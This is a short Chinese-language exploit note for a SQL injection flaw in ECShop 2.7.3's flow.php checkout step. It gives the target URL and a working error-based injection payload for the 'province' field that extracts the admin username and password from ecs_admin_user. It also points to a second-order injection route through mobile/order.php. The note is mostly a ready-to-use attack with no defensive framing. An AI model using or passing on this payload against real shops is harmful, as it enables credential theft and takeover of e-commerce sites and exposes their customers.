ecshop flow.php注入漏洞

影响版本

Ecshop 2.7.3

利用方法

添加商品至购物车,在填写收获信息 post到

http://localhost/ecshop2.7.3/flow.php?step=consignee&direct_shopping=1

抓包修改其中province字段为,利用现错注入形式获取数据

province=3') and (select 1 from(select count(*),concat((select (select (SELECT concat(user_name,0x7c,password) FROM ecs_admin_user limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 #

相关文件注入

注入用户-选择商品-加入购物车-结算抓包

http://127.0.0.1/ecshop/mobile/order.php?act=order_lise

此处主要利用的是二次注入的形式